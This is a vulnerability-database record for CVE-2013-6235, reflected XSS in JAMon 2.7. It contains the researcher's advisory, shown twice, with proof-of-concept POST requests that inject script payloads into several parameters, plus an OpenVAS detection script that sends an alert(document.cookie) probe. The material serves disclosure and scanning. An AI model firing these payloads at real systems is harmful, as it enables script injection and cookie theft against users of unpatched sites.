ID CVE-2013-6235 Type cve Reporter cve@mitre.org Modified 2018-10-09T19:34:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in JAMon (Java Application Monitor) 2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) listenertype or (2) currentlistener parameter to mondetail.jsp or ArraySQL parameter to (3) mondetail.jsp, (4) jamonadmin.jsp, (5) sql.jsp, or (6) exceptions.jsp.
{"securityvulns": [{"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-6235"], "description": "\r\n###################################################\r\n01. ### Advisory Information ###\r\n\r\nTitle: Multiple Reflected XSS vulnerabilities in JAMon\r\nDate published: 2013-01-23\r\nDate of last update: 2013-01-23\r\nVendors contacted: JAMon v 2.7\r\nDiscovered by: Christian Catalano\r\nSeverity: Low\r\n\r\n02. ### Vulnerability Information ###\r\n\r\nCVE reference: CVE-2013-6235\r\nCVSS v2 Base Score: 4.3\r\nCVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nComponent/s: JAMon v 2.7\r\nClass: Input Manipulation\r\n\r\n03. ### Introduction ###\r\n\r\nThe Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications.\r\n\r\nhttp://jamonapi.sourceforge.net\r\n\r\n04. ### Vulnerability Description ###\r\n\r\nMultiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application.\r\nJAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks.\r\nThis flaw exists because certain pages do not validate input before returning it to users.\r\n\r\n+------------------------------+-------------------+\r\n|-Vulnerable module(s)--------and----parameter(s)--|\r\n+------------------------------+-------------------+\r\n|mondetail.jsp --------------------ArraySQL--------|\r\n|mondetail.jsp --------------------listenertype----|\r\n|mondetail.jsp --------------------currentlistener-|\r\n|jamonadmin.jsp -------------------ArraySQL--------|\r\n|sql.jsp---------------------------ArraySQL--------|\r\n|exceptions.jsp--------------------ArraySQL--------|\r\n+------------------------------+-------------------+\r\n\r\n05. ### Technical Description / Proof of Concept Code ###\r\n\r\n05.01) Malicious Request ("ArraySQL" parameter):\r\n\r\nThe vulnerability is located in the ' Filter (optional) ' input field upon submission to the pages\r\n\r\nhttp://localhost/jamon/mondetail.jsp\r\nhttp://localhost/jamon/ jamonadmin.jsp\r\nhttp://localhost/jamon/ sql.jsp\r\nhttp://localhost/jamon/ exceptions.jsp\r\n\r\nThe application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts.\r\nThe attacker can inject the malicious javascript code:\r\n\r\n1-->1<ScRiPt >alert('XSS')</ScRiPt><!--\r\n\r\nin the ' Filter (optional) ' input field and click on GO! button.\r\n\r\n05.02) Malicious Request ("listenertype " parameter)\r\n\r\nPOST /jamon/mondetail.jsp HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/jamon/mondetail.jsp\r\nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 209\r\n\r\nlistenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21\r\n\r\n\r\n05.03) Malicious Request ("currentlistener " parameter)\r\n\r\nPOST /jamon/mondetail.jsp HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/jamon/mondetail.jsp\r\nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 195\r\n\r\nlistenertype=value&currentlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21\r\n\r\n06. ### Business Impact ###\r\n\r\nThis may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.\r\n\r\n07. ### Systems Affected ###\r\n\r\nThis vulnerability was tested against: JAMon v2.7\r\nOlder versions are probably affected too, but they were not checked.\r\n\r\n08. ### Vendor Information, Solutions and Workarounds ###\r\n\r\nCurrently, there are no known upgrades or patches to correct this vulnerability.\r\n\r\n09. ### Credits ###\r\n\r\nThis vulnerability has been discovered by:\r\nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com\r\n\r\n10. ### Vulnerability History ###\r\n\r\nOctober 18th, 2013: Vulnerability identification\r\nOctober 22th, 2013: Vendor notification [JAMon]\r\nDecember 10th, 2013: Vulnerability confirmation [JAMonI]\r\nJanuary 23th, 2014: Vulnerability disclosure\r\n\r\n11. ### Disclaimer ###\r\n\r\nThe information contained within this advisory is supplied "as-is" with\r\nno warranties or guarantees of fitness of use or otherwise.\r\nI accept no responsibility for any damage caused by the use or misuse of\r\nthis information.\r\n\r\n###################################################\r\n", "edition": 1, "modified": "2014-02-03T00:00:00", "published": "2014-02-03T00:00:00", "id": "SECURITYVULNS:DOC:30281", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30281", "title": "[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-1612", "CVE-2014-1631", "CVE-2013-6235", "CVE-2014-1476", "CVE-2013-5350", "CVE-2014-1632", "CVE-2014-0794", "CVE-2014-1475", "CVE-2014-0793", "CVE-2014-1607"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2014-02-03T00:00:00", "published": "2014-02-03T00:00:00", "id": "SECURITYVULNS:VULN:13548", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13548", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-08T19:05:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-6235"], "description": "This host is installed with JAMon and is prone to multiple cross site scripting\n vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2014-02-10T00:00:00", "id": "OPENVAS:1361412562310803799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803799", "type": "openvas", "title": "JAMon Multiple Cross-Site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# JAMon Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803799\");\n script_version(\"2020-05-06T13:33:54+0000\");\n script_cve_id(\"CVE-2013-6235\");\n script_bugtraq_id(65122);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:33:54 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-10 15:38:15 +0530 (Mon, 10 Feb 2014)\");\n script_name(\"JAMon Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with JAMon and is prone to multiple cross site scripting\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST request and check whether it is able to read\n cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Input passed via the 'ArraySQL', 'listenertype', and 'currentlistener' POST\n parameters to mondetail.jsp and the 'ArraySQL' POST parameter to jamonadmin.jsp,\n sql.jsp, and exceptions.jsp is not properly sanitised before being returned to\n the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"JAMon (Java Application Monitor) version 2.7 and prior\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56570\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/124933\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2014/Jan/164\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\njamonPort = http_get_port(default:80);\n\nhost = http_host_name(port:jamonPort);\n\nforeach dir (make_list_unique(\"/\", \"/jamon\", \"/monitor\", http_cgi_dirs(port:jamonPort)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n jamonReq = http_get(item:string(dir, \"/menu.jsp\"), port:jamonPort);\n jamonRes = http_keepalive_send_recv(port:jamonPort, data:jamonReq);\n\n ## Confirm the application\n if(jamonRes && ('>JAMon' >< jamonRes && \">Manage Monitor page <\" >< jamonRes ))\n {\n postdata = \"listenertype=value¤tlistener=JAMonBufferListener&\" +\n \"outputTypeValue=html&formatterValue=%23%2C%23%23%23&buf\" +\n \"ferSize=No+Action&TextSize=&highlight=&ArraySQL=1--%3E1\" +\n \"%3CScRiPt%3Ealert%28document.cookie%29%3C%2FScRiPt%3E%3\" +\n \"C%21--&actionSbmt=Go+%21\";\n\n jamonReq = string(\"POST \", dir, \"/mondetail.jsp HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n jamonRes = http_keepalive_send_recv(port:jamonPort, data:jamonReq);\n\n if(jamonRes =~ \"^HTTP/1\\.[01] 200\" && \"-->1<ScRiPt>alert(document.cookie)</ScRiPt><!--\" >< jamonRes &&\n \">JAMon - Monitor Detail\" >< jamonRes)\n {\n security_message(port:jamonPort);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:51", "description": "", "published": "2014-01-24T00:00:00", "type": "packetstorm", "title": "JAMon 2.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-6235"], "modified": "2014-01-24T00:00:00", "id": "PACKETSTORM:124933", "href": "https://packetstormsecurity.com/files/124933/JAMon-2.7-Cross-Site-Scripting.html", "sourceData": "`################################################### \n01. ### Advisory Information ### \n \nTitle: Multiple Reflected XSS vulnerabilities in JAMon \nDate published: 2013-01-23 \nDate of last update: 2013-01-23 \nVendors contacted: JAMon v 2.7 \nDiscovered by: Christian Catalano \nSeverity: Low \n \n02. ### Vulnerability Information ### \n \nCVE reference: CVE-2013-6235 \nCVSS v2 Base Score: 4.3 \nCVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nComponent/s: JAMon v 2.7 \nClass: Input Manipulation \n \n03. ### Introduction ### \n \nThe Java Application Monitor (JAMon) is a free, simple, high \nperformance, thread safe, Java API that allows developers to easily \nmonitor production applications. \n \nhttp://jamonapi.sourceforge.net \n \n04. ### Vulnerability Description ### \n \nMultiple Non-Persistent Cross-Site Scripting vulnerabilities have been \nidentified in the JAMon web application. \nJAMon contains a flaw that allows multiple reflected cross-site \nscripting (XSS) attacks. \nThis flaw exists because certain pages do not validate input before \nreturning it to users. \n \n+------------------------------+-------------------+ \n|-Vulnerable module(s)--------and----parameter(s)--| \n+------------------------------+-------------------+ \n|mondetail.jsp --------------------ArraySQL--------| \n|mondetail.jsp --------------------listenertype----| \n|mondetail.jsp --------------------currentlistener-| \n|jamonadmin.jsp -------------------ArraySQL--------| \n|sql.jsp---------------------------ArraySQL--------| \n|exceptions.jsp--------------------ArraySQL--------| \n+------------------------------+-------------------+ \n \n05. ### Technical Description / Proof of Concept Code ### \n \n05.01) Malicious Request (\"ArraySQL\" parameter): \n \nThe vulnerability is located in the ' Filter (optional) ' input field \nupon submission to the pages \n \nhttp://localhost/jamon/mondetail.jsp \nhttp://localhost/jamon/ jamonadmin.jsp \nhttp://localhost/jamon/ sql.jsp \nhttp://localhost/jamon/ exceptions.jsp \n \nThe application does not validate the 'ArraySQL' parameter upon \nsubmission to the *.jsp scripts. \nThe attacker can inject the malicious javascript code: \n \n1-->1<ScRiPt >alert('XSS')</ScRiPt><!-- \n \nin the ' Filter (optional) ' input field and click on GO! button. \n \n05.02) Malicious Request (\"listenertype \" parameter) \n \nPOST /jamon/mondetail.jsp HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 \nFirefox/22.0 Iceweasel/22.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/jamon/mondetail.jsp \nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 209 \n \nlistenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--¤tlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21 \n \n \n05.03) Malicious Request (\"currentlistener \" parameter) \n \nPOST /jamon/mondetail.jsp HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 \nFirefox/22.0 Iceweasel/22.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/jamon/mondetail.jsp \nCookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 195 \n \nlistenertype=value¤tlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21 \n \n06. ### Business Impact ### \n \nThis may allow an attacker to create a specially crafted request that \nwould execute arbitrary script code in a user's browser within the trust \nrelationship between their browser and the server. \n \n07. ### Systems Affected ### \n \nThis vulnerability was tested against: JAMon v2.7 \nOlder versions are probably affected too, but they were not checked. \n \n08. ### Vendor Information, Solutions and Workarounds ### \n \nCurrently, there are no known upgrades or patches to correct this \nvulnerability. \n \n09. ### Credits ### \n \nThis vulnerability has been discovered by: \nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com \n \n10. ### Vulnerability History ### \n \nOctober 18th, 2013: Vulnerability identification \nOctober 22th, 2013: Vendor notification [JAMon] \nDecember 10th, 2013: Vulnerability confirmation [JAMonI] \nJanuary 23th, 2014: Vulnerability disclosure \n \n11. ### Disclaimer ### \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. \nI accept no responsibility for any damage caused by the use or misuse of \nthis information. \n \n################################################### \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124933/jamon-xss.txt"}]}
